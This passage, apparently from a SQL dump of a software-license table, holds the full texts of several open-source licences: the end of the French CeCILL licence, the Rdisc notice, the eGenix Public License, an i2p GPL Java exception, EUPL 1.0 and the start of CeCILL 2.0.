sur ce\nLogiciel.\n\nArticle 3 - ACCEPTATION\n\n3.1. L\'acceptation par le Licencié des termes du Contrat est réputée acquise\ndu fait du premier des faits suivants:\n\n• (i) le chargement du Logiciel par tout moyen notamment par téléchargement\nà partir d\'un serveur distant ou par chargement à partir d\'un support physique;\n\n• (ii) le premier exercice par le Licencié de l\'un quelconque des droits concédés\npar le Contrat.\n\n3.2. Un exemplaire du Contrat, contenant notamment un avertissement relatif\naux spécificités du Logiciel, à la restriction de garantie et à la limitation\nà un usage par des utilisateurs expérimentés a été mis à disposition du Licencié\npréalablement à son acceptation telle que définie à l\'article 3.1 ci dessus\net le Licencié reconnaît en avoir pris connaissances.\n\nArticle 4 - ENTREE EN VIGUEUR ET DUREE\n\n 4.1. ENTREE EN VIGUEUR\n\nLe Contrat entre en vigueur à la date de son acceptation par le Licencié telle\nque définie en 3.1.\n\n 4.2. DUREE\n\nLe Contrat produira ses effets pendant toute la durée légale de protection\ndes droits patrimoniaux portant sur le Logiciel.\n\nArticle 5 - ETENDUE DES DROITS CONCEDES\n\nLe Concédant concède au Licencié, qui accepte, les droits suivants sur le\nLogiciel pour toutes destinations et pour la durée du Contrat dans les conditions\nci-après détaillées.\n\nPar ailleurs, le Concédant concède au Licencié à titre gracieux les droits\nd\'exploitation du ou des brevets qu\'il détient sur tout ou partie des inventions\n\nimplémentées dans le Logiciel.\n\n 5.1. DROITS D\'UTILISATION\n\nLe Licencié est autorisé à utiliser le Logiciel, sans restriction quant aux\ndomaines d\'application, étant ci-après précisé que cela comporte:\n\n1. la reproduction permanente ou provisoire du Logiciel en tout ou partie\npar tout moyen et sous toute forme.\n\n2. le chargement, l\'affichage, l\'exécution, ou le stockage du Logiciel sur\ntout support.\n\n3. la possibilité d\'en observer, d\'en étudier, ou d\'en tester le fonctionnement\nafin de déterminer les idées et principes qui sont à la base de n\'importe\nquel élément de ce Logiciel; et ceci, lorsque le Licencié effectue toute opération\nde chargement, d\'affichage, d\'exécution, de transmission ou de stockage du\nLogiciel qu\'il est en droit d\'effectuer en vertu du Contrat.\n\n 5.2. DROIT D\'APPORTER DES CONTRIBUTIONS\n\nLe droit d\'apporter des Contributions comporte le droit de traduire, d\'adapter,\nd\'arranger ou d\'apporter toute autre modification du Logiciel et le droit\nde reproduire le Logiciel en résultant.\n\nLe Licencié est autorisé à apporter toute Contribution au Logiciel sous réserve\nde mentionner, de façon explicite, son nom en tant qu\'auteur de cette Contribution\net la date de création de celle-ci.\n\n 5.3. DROITS DE DISTRIBUTION ET DE DIFFUSION\n\nLe droit de distribution et de diffusion comporte notamment le droit de transmettre\net de communiquer le Logiciel au public sur tout support et par tout moyen\nainsi que le droit de mettre sur le marché à titre onéreux ou gratuit, un\nou des exemplaires du Logiciel par tout procédé.\n\nLe Licencié est autorisé à redistribuer des copies du Logiciel, modifié ou\nnon, à des tiers dans les conditions ci-après détaillées.\n\n 5.3.1. REDISTRIBUTION DU LOGICIEL SANS MODIFICATION\n\nLe Licencié est autorisé à redistribuer des copies conformes du Logiciel,\nsous forme de Code Source ou de Code Objet, à condition que cette redistribution\nrespecte les dispositions du Contrat dans leur totalité et soit accompagnée:\n\n 1. d\'un exemplaire du Contrat,\n\n2. d\'un avertissement relatif à la restriction de garantie et de responsabilité\ndu Concédant telle que prévue aux articles 8 et 9,\n\net que, dans le cas où seul le Code Objet du Logiciel est redistribué, le\nLicencié permette aux futurs Licenciés d\'accéder facilement au Code Source\ncomplet du Logiciel en indiquant les modalités d\'accès, étant entendu que\nle coût additionnel d\'acquisition du Code Source ne devra pas excéder le simple\ncoût de transfert des données.\n\n 5.3.2. REDISTRIBUTION DU LOGICIEL MODIFIE\n\nLorsque le Licencié apporte une Contribution au Logiciel, les conditions de\nredistribution du Logiciel Modifié sont alors soumises à l\'intégralité des\ndispositions du Contrat.\n\nLe Licencié est autorisé à redistribuer le Logiciel Modifié, sous forme de\nCode Source ou de Code Objet, à condition que cette redistribution respecte\nles dispositions du Contrat dans leur totalité et soit accompagnée:\n\n 1. d\'un exemplaire du Contrat,\n\n2. d\'un avertissement relatif à la restriction de garantie et de responsabilité\ndu concédant telle que prévue aux articles 8 et 9,\n\net que, dans le cas où seul le Code Objet du Logiciel Modifié est redistribué,\nle Licencié permette aux futurs Licenciés d\'accéder facilement au Code Source\ncomplet du Logiciel Modifié en indiquant les modalités d\'accès, étant entendu\nque le coût additionnel d\'acquisition du Code Source ne devra pas excéder\nle simple coût de transfert des données.\n\n 5.3.3. REDISTRIBUTION DES MODULES DYNAMIQUES\n\nLorsque le Licencié a développé un Module Dynamique les conditions du Contrat\nne s\'appliquent pas à ce Module Dynamique, qui peut être distribué sous un\ncontrat de licence différent.\n\n 5.3.4. COMPATIBILITE AVEC LA LICENCE GPL\n\nDans le cas où le Logiciel, Modifié ou non, est intégré à un code soumis aux\ndispositions de la licence GPL, le Licencié est autorisé à redistribuer l\'ensemble\nsous la licence GPL.\n\nDans le cas où le Logiciel Modifié intègre un code soumis aux dispositions\nde la licence GPL, le Licencié est autorisé à redistribuer le Logiciel Modifié\nsous la licence GPL.\n\nArticle 6 - PROPRIETE INTELLECTUELLE\n\n 6.1. SUR LE LOGICIEL INITIAL\n\nLe Titulaire est détenteur des droits patrimoniaux sur le Logiciel Initial.\nToute utilisation du Logiciel Initial est soumise au respect des conditions\ndans lesquelles le Titulaire a choisi de diffuser son œuvre et nul autre n\'a\nla faculté de modifier les conditions de diffusion de ce Logiciel Initial.\n\nLe Titulaire s\'engage à maintenir la diffusion du Logiciel initial sous les\nconditions du Contrat et ce, pour la durée visée à l\'article 4.2.\n\n 6.2. SUR LES CONTRIBUTIONS\n\nLes droits de propriété intellectuelle sur les Contributions sont attachés\nau titulaire de droits patrimoniaux désigné par la législation applicable.\n\n 6.3. SUR LES MODULES DYNAMIQUES\n\nLe Licencié ayant développé un Module Dynamique est titulaire des droits de\npropriété intellectuelle sur ce Module Dynamique et reste libre du choix du\ncontrat régissant sa diffusion.\n\n 6.4. DISPOSITIONS COMMUNES\n\n 6.4.1. Le Licencié s\'engage expressément:\n\n1. à ne pas supprimer ou modifier de quelque manière que ce soit les mentions\nde propriété intellectuelle apposées sur le Logiciel;\n\n2. à reproduire à l\'identique lesdites mentions de propriété intellectuelle\nsur les copies du Logiciel.\n\n6.4.2. Le Licencié s\'engage à ne pas porter atteinte, directement ou indirectement,\naux droits de propriété intellectuelle du Titulaire et/ou des Contributeurs\net à prendre, le cas échéant, à l\'égard de son personnel toutes les mesures\nnécessaires pour assurer le respect des dits droits de propriété intellectuelle\ndu Titulaire et/ou des Contributeurs.\n\nArticle 7 - SERVICES ASSOCIES\n\n7.1. Le Contrat n\'oblige en aucun cas le Concédant à la réalisation de prestations\nd\'assistance technique ou de maintenance du Logiciel.\n\nCependant le Concédant reste libre de proposer ce type de services. Les termes\net conditions d\'une telle assistance technique et/ou d\'une telle maintenance\nseront alors déterminés dans un acte séparé. Ces actes de maintenance et/ou\nassistance technique n\'engageront que la seule responsabilité du Concédant\nqui les propose.\n\n7.2. De même, tout Concédant est libre de proposer, sous sa seule responsabilité,\nà ses licenciés une garantie, qui n\'engagera que lui, lors de la redistribution\ndu Logiciel et/ou du Logiciel Modifié et ce, dans les conditions qu\'il souhaite.\nCette garantie et les modalités financières de son application feront l\'objet\nd\'un acte séparé entre le Concédant et le Licencié.\n\nArticle 8 - RESPONSABILITE\n\n8.1. Sous réserve des dispositions de l\'article 8.2, si le Concédant n\'exécute\npas tout ou partie des obligations mises à sa charge par le Contrat, le Licencié\na la faculté, sous réserve de prouver la faute du Concédant concerné, de solliciter\nla réparation du préjudice direct qu\'il subit et dont il apportera la preuve.\n\n8.2. La responsabilité du Concédant est limitée aux engagements pris en application\ndu Contrat et ne saurait être engagée en raison notamment:(i) des dommages\ndus à l\'inexécution, totale ou partielle, de ses obligations par le Licencié,\n(ii) des dommages directs ou indirects découlant de l\'utilisation ou des performances\ndu Logiciel subis par le Licencié lorsqu\'il s\'agit d\'un professionnel utilisant\nle Logiciel à des fins professionnelles et (iii) des dommages indirects découlant\nde l\'utilisation ou des performances du Logiciel. Les Parties conviennent\nexpressément que tout préjudice financier ou commercial (par exemple perte\nde données, perte de bénéfices, perte d\'exploitation, perte de clientèle ou\nde commandes, manque à gagner, trouble commercial quelconque) ou toute action\ndirigée contre le Licencié par un tiers, constitue un dommage indirect et\nn\'ouvre pas droit à réparation par le Concédant.\n\nArticle 9 - GARANTIE\n\n9.1. Le Licencié reconnaît que l\'état actuel des connaissances scientifiques\net techniques au moment de la mise en circulation du Logiciel ne permet pas\nd\'en tester et d\'en vérifier toutes les utilisations ni de détecter l\'existence\nd\'éventuels défauts. L\'attention du Licencié a été attirée sur ce point sur\nles risques associés au chargement, à l\'utilisation, la modification et/ou\nau développement et à la reproduction du Logiciel qui sont réservés à des\nutilisateurs avertis.\n\nIl relève de la responsabilité du Licencié de contrôler, par tous moyens,\nl\'adéquation du produit à ses besoins, son bon fonctionnement et de s\'assurer\nqu\'il ne causera pas de dommages aux personnes et aux biens.\n\n9.2. Le Concédant déclare de bonne foi être en droit de concéder l\'ensemble\ndes droits attachés au Logiciel (comprenant notamment les droits visés à l\'article\n5).\n\n9.3. Le Licencié reconnaît que le Logiciel est fourni «en l\'état» par le Concédant\nsans autre garantie, expresse ou tacite, que celle prévue à l\'article 9.2\net notamment sans aucune garantie sur sa valeur commerciale, son caractère\nsécurisé, innovant ou pertinent.\n\nEn particulier, le Concédant ne garantit pas que le Logiciel est exempt d\'erreur,\nqu\'il fonctionnera sans interruption, qu\'il sera compatible avec l\'équipement\ndu Licencié et sa configuration logicielle ni qu\'il remplira les besoins du\nLicencié.\n\n9.4. Le Concédant ne garantit pas, de manière expresse ou tacite, que le Logiciel\nne porte pas atteinte à un quelconque droit de propriété intellectuelle d\'un\ntiers portant sur un brevet, un logiciel ou sur tout autre droit de propriété.\nAinsi, le Concédant exclut toute garantie au profit du Licencié contre les\nactions en contrefaçon qui pourraient être diligentées au titre de l\'utilisation,\nde la modification, et de la redistribution du Logiciel. Néanmoins, si de\ntelles actions sont exercées contre le Licencié, le Concédant lui apportera\nson aide technique et juridique pour sa défense. Cette aide technique et juridique\nest déterminée au cas par cas entre le Concédant concerné et le Licencié dans\nle cadre d\'un protocole d\'accord. Le Concédant dégage toute responsabilité\nquant à l\'utilisation de la dénomination du Logiciel par le Licencié. Aucune\ngarantie n\'est apportée quant à l\'existence de droits antérieurs sur le nom\ndu Logiciel et sur l\'existence d\'une marque.\n\nArticle 10 - RESILIATION\n\n10.1. En cas de manquement par le Licencié aux obligations mises à sa charge\npar le Contrat, le Concédant pourra résilier de plein droit le Contrat trente\n(30) jours après notification adressée au Licencié et restée sans effet.\n\n10.2. Le Licencié dont le Contrat est résilié n\'est plus autorisé à utiliser,\nmodifier ou distribuer le Logiciel. Cependant, toutes les licences qu\'il aura\nconcédées antérieurement à la résiliation du Contrat resteront valides sous\nréserve qu\'elles aient été effectuées en conformité avec le Contrat.\n\nArticle 11 - DISPOSITIONS DIVERSES\n\n 11.1. CAUSE EXTERIEURE\n\nAucune des Parties ne sera responsable d\'un retard ou d\'une défaillance d\'exécution\ndu Contrat qui serait dû à un cas de force majeure, un cas fortuit ou une\ncause extérieure, telle que, notamment, le mauvais fonctionnement ou les interruptions\ndu réseau électrique ou de télécommunication, la paralysie du réseau liée\nà une attaque informatique, l\'intervention des autorités gouvernementales,\nles catastrophes naturelles, les dégâts des eaux, les tremblements de terre,\nle feu, les explosions, les grèves et les conflits sociaux, l\'état de guerre…\n\n11.2. Le fait, par l\'une ou l\'autre des Parties, d\'omettre en une ou plusieurs\noccasions de se prévaloir d\'une ou plusieurs dispositions du Contrat, ne pourra\nen aucun cas impliquer renonciation par la Partie intéressée à s\'en prévaloir\nultérieurement.\n\n11.3. Le Contrat annule et remplace toute convention antérieure, écrite ou\norale, entre les Parties sur le même objet et constitue l\'accord entier entre\nles Parties sur cet objet. Aucune addition ou modification aux termes du Contrat\nn\'aura d\'effet à l\'égard des Parties à moins d\'être faite par écrit et signée\npar leurs représentants dûment habilités.\n\n11.4. Dans l\'hypothèse où une ou plusieurs des dispositions du Contrat s\'avèrerait\ncontraire à une loi ou à un texte applicable, existants ou futurs, cette loi\nou ce texte prévaudrait, et les Parties feraient les amendements nécessaires\npour se conformer à cette loi ou à ce texte. Toutes les autres dispositions\nresteront en vigueur. De même, la nullité, pour quelque raison que ce soit,\nd\'une des dispositions du Contrat ne saurait entraîner la nullité de l\'ensemble\ndu Contrat.\n\n 11.5. LANGUE\n\nLe Contrat est rédigé en langue française et en langue anglaise. En cas de\ndivergence d\'interprétation, seule la version française fait foi.\n\nArticle 12 - NOUVELLES VERSIONS DU CONTRAT\n\n12.1. Toute personne est autorisée à copier et distribuer des copies de ce\nContrat.\n\n12.2. Afin d\'en préserver la cohérence, le texte du Contrat est protégé et\nne peut être modifié que par les auteurs de la licence, lesquels se réservent\nle droit de publier périodiquement des mises à jour ou de nouvelles versions\ndu Contrat, qui possèderont chacune un numéro distinct. Ces versions ultérieures\nseront susceptibles de prendre en compte de nouvelles problématiques rencontrées\npar les logiciels libres.\n\n12.3. Tout Logiciel diffusé sous une version donnée du Contrat ne pourra faire\nl\'objet d\'une diffusion ultérieure que sous la même version du Contrat ou\nune version postérieure, sous réserve des dispositions de l\'article 5.3.4.\n\nArticle 13 - LOI APPLICABLE ET COMPETENCE TERRITORIALE\n\n13.1. Le Contrat est régi par la loi française. Les Parties conviennent de\ntenter de régler à l\'amiable les différends ou litiges qui viendraient à se\nproduire par suite ou à l\'occasion du Contrat.\n\n13.2. A défaut d\'accord amiable dans un délai de deux (2) mois à compter de\nleur survenance et sauf situation relevant d\'une procédure d\'urgence, les\ndifférends ou litiges seront portés par la Partie la plus diligente devant\nles Tribunaux compétents de Paris.\n\n1 Ce: CEA, C: CNRS, I: INRIA, LL: Logiciel Libre Version 1 du 21/06/2004\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(207,'Rdisc','Rdisc (this program) was developed by Sun Microsystems, Inc. and is provided\nfor unrestricted use provided that this legend is included on all tape media\nand as a part of the software program in whole or part. Users may copy or\nmodify Rdisc without charge, and they may freely distribute it.\n\nRDISC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE WARRANTIES\nOF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE, OR ARISING\nFROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE.\n\nRdisc is provided with no support and without any obligation on the part of\nSun Microsystems, Inc. to assist in its use, correction, modification or enhancement.\n\nSUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE INFRINGEMENT\nOF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY RDISC OR ANY PART THEREOF.\n\nIn no event will Sun Microsystems, Inc. be liable for any lost revenue or\nprofits or other special, indirect and consequential damages, even if Sun\nhas been advised of the possibility of such damages.\n\nSun Microsystems, Inc.\n\n2550 Garcia Avenue\n\nMountain View, California 94043\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(208,'eGenix','EGENIX.COM PUBLIC LICENSE AGREEMENT\n\nVersion 1.1.0 This license agreement is based on the Python CNRI License Agreement,\na widely accepted open- source license.\n\n 1. Introduction\n\nThis \"License Agreement\" is between eGenix.com Software, Skills and Services\nGmbH (\"eGenix.com\"), having an office at Pastor-Loeh-Str. 48, D-40764 Langenfeld,\nGermany, and the Individual or Organization (\"Licensee\") accessing and otherwise\nusing this software in source or binary form and its associated documentation\n(\"the Software\").\n\n 2. License\n\nSubject to the terms and conditions of this eGenix.com Public License Agreement,\neGenix.com hereby grants Licensee a non-exclusive, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly, prepare\nderivative works, distribute, and otherwise use the Software alone or in any\nderivative version, provided, however, that the eGenix.com Public License\nAgreement is retained in the Software, or in any derivative version of the\nSoftware prepared by Licensee.\n\n 3. NO WARRANTY\n\neGenix.com is making the Software available to Licensee on an \"AS IS\" basis.\nSUBJECT TO ANY STATUTORY WARRANTIES WHICH CAN NOT BE EXCLUDED, EGENIX.COM\nMAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE,\nBUT NOT LIMITATION, EGENIX.COM MAKES NO AND DISCLAIMS ANY REPRESENTATION OR\nWARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n 4. LIMITATION OF LIABILITY\n\nEGENIX.COM SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE\nFOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS (INCLUDING,\nWITHOUT LIMITATION, DAMAGES FOR LOSS OF BUSINESS PROFITS, BUSINESS INTERRUPTION,\nLOSS OF BUSINESS INFORMATION, OR OTHER PECUNIARY LOSS) AS A RESULT OF USING,\nMODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF, EVEN IF\nADVISED OF THE POSSIBILITY THEREOF. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION\nOR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THE ABOVE EXCLUSION\nOR LIMITATION MAY NOT APPLY TO LICENSEE.\n\n 5. Termination\n\nThis License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n 6. Third Party Rights\n\nAny software or documentation in source or binary form provided along with\nthe Software that is associated with a separate license agreement is licensed\nto Licensee under the terms of that license agreement. This License Agreement\ndoes not apply to those portions of the Software. Copies of the third party\nlicenses are included in the Software Distribution.\n\n 7. General\n\nNothing in this License Agreement affects any statutory rights of consumers\nthat cannot be waived or limited by contract.\n\nNothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between eGenix.com and Licensee.\n\nIf any provision of this License Agreement shall be unlawful, void, or for\nany reason unenforceable, such provision shall be modified to the extent necessary\nto render it enforceable without losing its intent, or, if no such modification\nis possible, be severed from this License Agreement and shall not affect the\nvalidity and enforceability of the remaining provisions of this License Agreement.\n\nThis License Agreement shall be governed by and interpreted in all respects\nby the law of Germany, excluding conflict of law provisions. It shall not\nbe governed by the United Nations Convention on Contracts for International\nSale of Goods. This License Agreement does not grant permission to use eGenix.com\ntrademarks or trade names in a trademark sense to endorse or promote products\nor services of Licensee, or any third party.\n\nThe controlling language of this License Agreement is English. If Licensee\nhas received a translation into another language, it has been provided for\nLicensee\'s convenience only.\n\n 8. Agreement\n\nBy downloading, copying, installing or otherwise using the Software, Licensee\nagrees to be bound by the terms and conditions of this License Agreement.\nFor question regarding this License Agreement, please write to:\n\neGenix.com Software, Skills and Services GmbH\n\nPastor-Loeh-Str. 48\n\nD-40764 Langenfeld\n\nGermany\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(209,'i2p-gpl-java-exception','In addition, as a special exception, XXXX gives permission to link the code of this program with the proprietary Java implementation provided by Sun (or other vendors as well), and distribute linked combinations including the two. You must obey the GNU General Public License in all respects for all of the code used other than the proprietary Java implementation. If you modify this file, you may extend this exception to your version of the file, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(210,'EUPL-1.0','European Union Public Licence V.1.0\n\nEUPL (c) the European Community 2007 This European Union Public Licence (the\n\"EUPL\") applies to the Work or Software (as defined below) which is provided\nunder the terms of this Licence. Any use of the Work, other than as authorised\nunder this Licence is prohibited (to the extent such use is covered by a right\nof the copyright holder of the Work).\n\nThe Original Work is provided under the terms of this Licence when the Licensor\n(as defined below) has placed the following notice immediately following the\ncopyright notice for the Original Work:\n\nLicensed under the EUPL V.1.0\n\nor has expressed by any other mean his willingness to license under the EUPL.\n\n 1. Definitions\n\n In this Licence, the following terms have the following meaning:\n\n − The Licence: this Licence.\n\n− The Original Work or the Software: the software distributed and/or communicated\nby the Licensor under this Licence, available as Source Code and also as Executable\nCode as the case may be.\n\n− Derivative Works: the works or software that could be created by the Licensee,\nbased upon the Original Work or modifications thereof. This Licence does not\ndefine the extent of modification or dependence on the Original Work required\nin order to classify a work as a Derivative Work; this extent is determined\nby copyright law applicable in the country mentioned in Article 15.\n\n − The Work: the Original Work and/or its Derivative Works.\n\n− The Source Code: the human-readable form of the Work which is the most convenient\nfor people to study and modify.\n\n− The Executable Code: any code which has generally been compiled and which\nis meant to be interpreted by a computer as a program.\n\n− The Licensor: the natural or legal person that distributes and/or communicates\nthe Work under the Licence.\n\n− Contributor(s): any natural or legal person who modifies the Work under\nthe Licence, or otherwise contributes to the creation of a Derivative Work.\n\n− The Licensee or \"You\": any natural or legal person who makes any usage of\nthe Software under the terms of the Licence. − Distribution and/or Communication:\nany act of selling, giving, lending, renting, distributing, communicating,\ntransmitting, or otherwise making available, on-line or off-line, copies of\nthe Work at the disposal of any other natural or legal person.\n\n 2. Scope of the rights granted by the Licence\n\nThe Licensor hereby grants You a world-wide, royalty-free, non-exclusive,\nsub-licensable licence to do the following, for the duration of copyright\nvested in the Original Work:\n\n − use the Work in any circumstance and for all usage,\n\n − reproduce the Work,\n\n− modify the Original Work, and make Derivative Works based upon the Work,\n\n− communicate to the public, including the right to make available or display\nthe Work or copies thereof to the public and perform publicly, as the case\nmay be, the Work,\n\n − distribute the Work or copies thereof,\n\n − lend and rent the Work or copies thereof,\n\n − sub-license rights in the Work or copies thereof.\n\nThose rights can be exercised on any media, supports and formats, whether\nnow known or later invented, as far as the applicable law permits so.\n\nIn the countries where moral rights apply, the Licensor waives his right to\nexercise his moral right to the extent allowed by law in order to make effective\nthe licence of the economic rights here above listed.\n\nThe Licensor grants to the Licensee royalty-free, non exclusive usage rights\nto any patents held by the Licensor, to the extent necessary to make use of\nthe rights granted on the Work under this Licence.\n\n 3. Communication of the Source Code\n\nThe Licensor may provide the Work either in its Source Code form, or as Executable\nCode. If the Work is provided as Executable Code, the Licensor provides in\naddition a machinereadable copy of the Source Code of the Work along with\neach copy of the Work that the Licensor distributes or indicates, in a notice\nfollowing the copyright notice attached to the Work, a repository where the\nSource Code is easily and freely accessible for as long as the Licensor continues\nto distribute and/or communicate the Work.\n\n 4. Limitations on copyright\n\nNothing in this Licence is intended to deprive the Licensee of the benefits\nfrom any exception or limitation to the exclusive rights of the rights owners\nin the Original Work or Software, of the exhaustion of those rights or of\nother applicable limitations thereto.\n\n 5. Obligations of the Licensee\n\nThe grant of the rights mentioned above is subject to some restrictions and\nobligations imposed on the Licensee. Those obligations are the following:\n\nAttribution right: the Licensee shall keep intact all copyright, patent or\ntrademarks notices and all notices that refer to the Licence and to the disclaimer\nof warranties. The Licensee must include a copy of such notices and a copy\nof the Licence with every copy of the Work he/she distributes and/or communicates.\nThe Licensee must cause any Derivative Work to carry prominent notices stating\nthat the Work has been modified and the date of modification.\n\nCopyleft clause: If the Licensee distributes and/or communicates copies of\nthe Original Works or Derivative Works based upon the Original Work, this\nDistribution and/or Communication will be done under the terms of this Licence.\nThe Licensee (becoming Licensor) cannot offer or impose any additional terms\nor conditions on the Work or Derivative Work that alter or restrict the terms\nof the Licence.\n\nCompatibility clause: If the Licensee Distributes and/or Communicates Derivative\nWorks or copies thereof based upon both the Original Work and another work\nlicensed under a Compatible Licence, this Distribution and/or Communication\ncan be done under the terms of this Compatible Licence. For the sake of this\nclause, \"Compatible Licence\" refers to the licences listed in the appendix\nattached to this Licence. Should the Licensee\'s obligations under the Compatible\nLicence conflict with his/her obligations under this Licence, the obligations\nof the Compatible Licence shall prevail.\n\nProvision of Source Code: When distributing and/or communicating copies of\nthe Work, the Licensee will provide a machine-readable copy of the Source\nCode or indicate a repository where this Source will be easily and freely\navailable for as long as the Licensee continues to distribute and/or communicate\nthe Work.\n\nLegal Protection: This Licence does not grant permission to use the trade\nnames, trademarks, service marks, or names of the Licensor, except as required\nfor reasonable and customary use in describing the origin of the Work and\nreproducing the content of the copyright notice.\n\n 6. Chain of Authorship\n\nThe original Licensor warrants that the copyright in the Original Work granted\nhereunder is owned by him/her or licensed to him/her and that he/she has the\npower and authority to grant the Licence.\n\nEach Contributor warrants that the copyright in the modifications he/she brings\nto the Work are owned by him/her or licensed to him/her and that he/she has\nthe power and authority to grant the Licence.\n\nEach time You, as a Licensee, receive the Work, the original Licensor and\nsubsequent Contributors grant You a licence to their contributions to the\nWork, under the terms of this Licence.\n\n 7. Disclaimer of Warranty\n\nThe Work is a work in progress, which is continuously improved by numerous\ncontributors. It is not a finished work and may therefore contain defects\nor \"bugs\" inherent to this type of software development.\n\nFor the above reason, the Work is provided under the Licence on an \"as is\"\nbasis and without warranties of any kind concerning the Work, including without\nlimitation merchantability, fitness for a particular purpose, absence of defects\nor errors, accuracy, non-infringement of intellectual property rights other\nthan copyright as stated in Article 6 of this Licence.\n\nThis disclaimer of warranty is an essential part of the Licence and a condition\nfor the grant of any rights to the Work.\n\n 8. Disclaimer of Liability\n\nExcept in the cases of wilful misconduct or damages directly caused to natural\npersons, the Licensor will in no event be liable for any direct or indirect,\nmaterial or moral, damages of any kind, arising out of the Licence or of the\nuse of the Work, including without limitation, damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, loss of data or any commercial\ndamage, even if the Licensor has been advised of the possibility of such damage.\nHowever, the Licensor will be liable under statutory product liability laws\nas far such laws apply to the Work.\n\n 9. Additional agreements\n\nWhile distributing the Original Work or Derivative Works, You may choose to\nconclude an additional agreement to offer, and charge a fee for, acceptance\nof support, warranty, indemnity, or other liability obligations and/or services\nconsistent with this Licence. However, in accepting such obligations, You\nmay act only on your own behalf and on your sole responsibility, not on behalf\nof the original Licensor or any other Contributor, and only if You agree to\nindemnify, defend, and hold each Contributor harmless for any liability incurred\nby, or claims asserted against such Contributor by the fact You have accepted\nany such warranty or additional liability.\n\n 10. Acceptance of the Licence\n\nThe provisions of this Licence can be accepted by clicking on an icon \"I agree\"\nplaced under the bottom of a window displaying the text of this Licence or\nby affirming consent in any other similar way, in accordance with the rules\nof applicable law. Clicking on that icon indicates your clear and irrevocable\nacceptance of this Licence and all of its terms and conditions.\n\nSimilarly, you irrevocably accept this Licence and all of its terms and conditions\nby exercising any rights granted to You by Article 2 of this Licence, such\nas the use of the Work, the creation by You of a Derivative Work or the Distribution\nand/or Communication by You of the Work or copies thereof.\n\n 11. Information to the public\n\nIn case of any Distribution and/or Communication of the Work by means of electronic\ncommunication by You (for example, by offering to download the Work from a\nremote location) the distribution channel or media (for example, a website)\nmust at least provide to the public the information requested by the applicable\nlaw regarding the identification and address of the Licensor, the Licence\nand the way it may be accessible, concluded, stored and reproduced by the\nLicensee.\n\n 12. Termination of the Licence\n\nThe Licence and the rights granted hereunder will terminate automatically\nupon any breach by the Licensee of the terms of the Licence.\n\nSuch a termination will not terminate the licences of any person who has received\nthe Work from the Licensee under the Licence, provided such persons remain\nin full compliance with the Licence.\n\n 13. Miscellaneous\n\nWithout prejudice of Article 9 above, the Licence represents the complete\nagreement between the Parties as to the Work licensed hereunder.\n\nIf any provision of the Licence is invalid or unenforceable under applicable\nlaw, this will not affect the validity or enforceability of the Licence as\na whole. Such provision will be construed and/or reformed so as necessary\nto make it valid and enforceable.\n\nThe European Commission may put into force translations and/or binding new\nversions of this Licence, so far this is required and reasonable. New versions\nof the Licence will be published with a unique version number. The new version\nof the Licence becomes binding for You as soon as You become aware of its\npublication.\n\n 14. Jurisdiction\n\nAny litigation resulting from the interpretation of this License, arising\nbetween the European Commission, as a Licensor, and any Licensee, will be\nsubject to the jurisdiction of the Court of Justice of the European Communities,\nas laid down in article 238 of the Treaty establishing the European Community.\n\nAny litigation arising between Parties, other than the European Commission,\nand resulting from the interpretation of this License, will be subject to\nthe exclusive jurisdiction of the competent court where the Licensor resides\nor conducts its primary business.\n\n 15. Applicable Law\n\nThis Licence shall be governed by the law of the European Union country where\nthe Licensor resides or has his registered office.\n\n This licence shall be governed by the Belgian law if:\n\n− a litigation arises between the European Commission, as a Licensor, and\nany Licensee;\n\n− the Licensor, other than the European Commission, has no residence or registered\noffice inside a European Union country.\n\nAppendix\n\n\"Compatible Licences\" according to article 5 EUPL are:\n\n − General Public License (GPL) v. 2\n\n − Open Software License (OSL) v. 2.1, v. 3.0\n\n − Common Public License v. 1.0\n\n − Eclipse Public License v. 1.0\n\n − Cecill v. 2.0\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(211,'CECILL-2.0','CeCILL FREE SOFTWARE LICENSE AGREEMENT Notice\n\nThis Agreement is a Free Software license agreement that is the result of\ndiscussions between its authors in order to ensure compliance with the two\nmain principles guiding its drafting:\n\n* firstly, compliance with the principles governing the distribution of Free\nSoftware: access to source code, broad rights granted to users,\n\n* secondly, the election of a governing law, French law, with which it is\nconformant, both as regards the law of torts and intellectual property law,\nand the protection that it offers to both authors and holders of the economic\nrights over software.\n\nThe authors of the CeCILL¹ license are:\n\n \n\nCommissariat à l\'Energie Atomique - CEA, a public scientific, technical and\nindustrial research establishment, having its principal place of business\nat 25 rue Leblanc, immeuble Le Ponant D, 75015 Paris, France.\n\n \n\nCentre National de la Recherche Scientifique - CNRS, a public scientific and\ntechnological establishment, having its principal place of business at 3 rue\nMichel-Ange, 75794 Paris cedex 16, France.\n\n \n\nInstitut National de Recherche en Informatique et en Automatique - INRIA,\na public scientific and technological establishment, having its principal\nplace of business at Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay\ncedex, France.\n\nPreamble The purpose of this Free Software license agreement is to grant users\nthe right to modify and redistribute the software governed by this license\nwithin the framework of an open source distribution model.\n\nThe exercising of these rights is conditional upon certain obligations for\nusers so as to preserve this status for all 